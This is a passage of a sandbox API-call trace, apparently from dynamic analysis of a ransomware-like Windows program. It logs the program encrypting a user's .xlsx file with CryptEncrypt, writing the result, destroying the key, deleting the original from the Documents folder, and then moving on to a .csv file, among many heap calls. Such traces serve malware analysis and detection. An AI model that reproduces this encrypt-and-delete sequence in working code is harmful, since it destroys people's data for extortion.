hHeap=0x1780000) returned 1 [0078.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0078.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0078.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0078.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0078.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0078.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0078.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0078.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0078.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0078.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0078.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0078.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac740 | out: hHeap=0x1780000) returned 1 [0078.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0078.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0078.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0078.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0078.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0078.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0078.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0078.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0078.776] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0078.776] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0078.776] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0078.776] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.776] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0078.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cae68, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0078.776] CryptEncrypt (in: hKey=0x41ac640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0x2262, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0x2270) returned 1 [0078.776] CharLowerBuffW (in: lpsz="byte[8817]", cchLength=0xa | out: lpsz="byte[8817]") returned 0xa [0078.777] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.777] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0078.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb198, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0078.777] CryptEncrypt (in: hKey=0x41ac640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48f6798*, pdwDataLen=0x144e538*=0x2262, dwBufLen=0x2270 | out: pbData=0x48f6798*, pdwDataLen=0x144e538*=0x2270) returned 1 [0078.777] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0078.777] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0078.777] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0078.777] WriteFile (in: hFile=0x298, lpBuffer=0x48f22c0*, nNumberOfBytesToWrite=0x2270, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x48f22c0*, lpNumberOfBytesWritten=0x144ef3c*=0x2270, lpOverlapped=0x0) returned 1 [0078.778] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0078.778] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.779] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0078.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43cac10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0078.779] CryptDestroyKey (hKey=0x41ac640) returned 1 [0078.779] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0078.779] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0078.784] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0078.784] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0078.784] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0078.784] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0078.784] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.784] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0078.784] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.784] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0078.784] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796fc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0078.784] CryptReleaseContext (hProv=0x41a4fa8, dwFlags=0x0) returned 1 [0078.784] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.784] FreeLibrary (hLibModule=0x756e0000) returned 1 [0078.784] CloseHandle (hObject=0x258) returned 1 [0078.784] CloseHandle (hObject=0x298) returned 1 [0078.797] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\6O-EvMa xQmykruQi.xlsx", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\6O-EvMa xQmykruQi.xlsx", lpFilePart=0x0) returned 0x37 [0078.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431dcf8 [0078.797] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\6O-EvMa xQmykruQi.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\6o-evma xqmykruqi.xlsx")) returned 0x20 [0078.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0078.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0078.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0078.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0078.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0078.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0078.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0078.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0078.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c40 [0078.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0078.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431de60 [0078.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0078.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0078.798] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\6O-EvMa xQmykruQi.xlsx", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5ff20cd0, ftCreationTime.dwHighDateTime=0x1d5ecb2, ftLastAccessTime.dwLowDateTime=0x47d95710, ftLastAccessTime.dwHighDateTime=0x1d5ede4, ftLastWriteTime.dwLowDateTime=0x47d95710, ftLastWriteTime.dwHighDateTime=0x1d5ede4, nFileSizeHigh=0x0, nFileSizeLow=0x2262, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="6O-EvMa xQmykruQi.xlsx", cAlternateFileName="6O-EVM~1.XLS")) returned 0x41ac140 [0078.798] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\6O-EvMa xQmykruQi.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\6o-evma xqmykruqi.xlsx")) returned 1 [0078.801] FindNextFileW (in: hFindFile=0x41ac140, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5ff20cd0, ftCreationTime.dwHighDateTime=0x1d5ecb2, ftLastAccessTime.dwLowDateTime=0x47d95710, ftLastAccessTime.dwHighDateTime=0x1d5ede4, ftLastWriteTime.dwLowDateTime=0x47d95710, ftLastWriteTime.dwHighDateTime=0x1d5ede4, nFileSizeHigh=0x0, nFileSizeLow=0x2262, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="6O-EvMa xQmykruQi.xlsx", cAlternateFileName="6O-EVM~1.XLS")) returned 0 [0078.801] FindClose (in: hFindFile=0x41ac140 | out: hFindFile=0x41ac140) returned 1 [0078.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0078.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0078.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0078.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0078.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431dcf8 | out: hHeap=0x1780000) returned 1 [0078.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0078.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0078.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0078.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0078.802] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0078.802] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0078.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0078.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0078.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0078.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0078.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0078.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0078.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0078.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5b8 | out: hHeap=0x1780000) returned 1 [0078.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19e5358 | out: hHeap=0x1780000) returned 1 [0078.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0078.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0078.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0078.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf590 | out: hHeap=0x1780000) returned 1 [0078.802] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0078.802] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0078.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0078.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf590 [0078.802] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0078.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf590 | out: hHeap=0x1780000) returned 1 [0078.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0078.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf590 [0078.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e23a0 [0078.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0078.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0078.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0078.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0078.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0078.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0078.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0078.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a240 [0078.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0078.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0078.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0078.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0078.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc0) returned 0x1b22250 [0078.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a240 | out: hHeap=0x1780000) returned 1 [0078.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0078.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0078.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0078.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca418 [0078.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0078.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0078.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2400 [0078.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0078.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0078.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0078.804] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0078.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0078.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0078.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0078.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0078.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0078.804] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0078.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5b8 [0078.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0078.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0078.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0078.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0078.804] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\7QJQVMK.csv", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0bf4640, ftCreationTime.dwHighDateTime=0x1d5e8f3, ftLastAccessTime.dwLowDateTime=0xa7a67830, ftLastAccessTime.dwHighDateTime=0x1d5eb55, ftLastWriteTime.dwLowDateTime=0xa7a67830, ftLastWriteTime.dwHighDateTime=0x1d5eb55, nFileSizeHigh=0x0, nFileSizeLow=0x740a, dwReserved0=0x101adf4, dwReserved1=0x8, cFileName="7QJQVMK.csv", cAlternateFileName="")) returned 0x41ac600 [0078.804] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0078.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0078.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0078.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5b8 | out: hHeap=0x1780000) returned 1 [0078.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0078.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0078.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0078.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391930 [0078.805] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0078.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391930 | out: hHeap=0x1780000) returned 1 [0078.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0078.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5b8 [0078.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24d0 [0078.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0078.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0078.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0078.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0078.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0078.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca250 [0078.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0078.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0078.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0078.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0078.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0078.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0078.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0078.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0078.805] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0078.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0078.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0078.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0078.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0078.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0078.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0078.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0078.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0078.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b60 [0078.806] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0078.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b60 | out: hHeap=0x1780000) returned 1 [0078.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0078.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0078.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2430 [0078.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0078.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0078.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0078.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0078.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 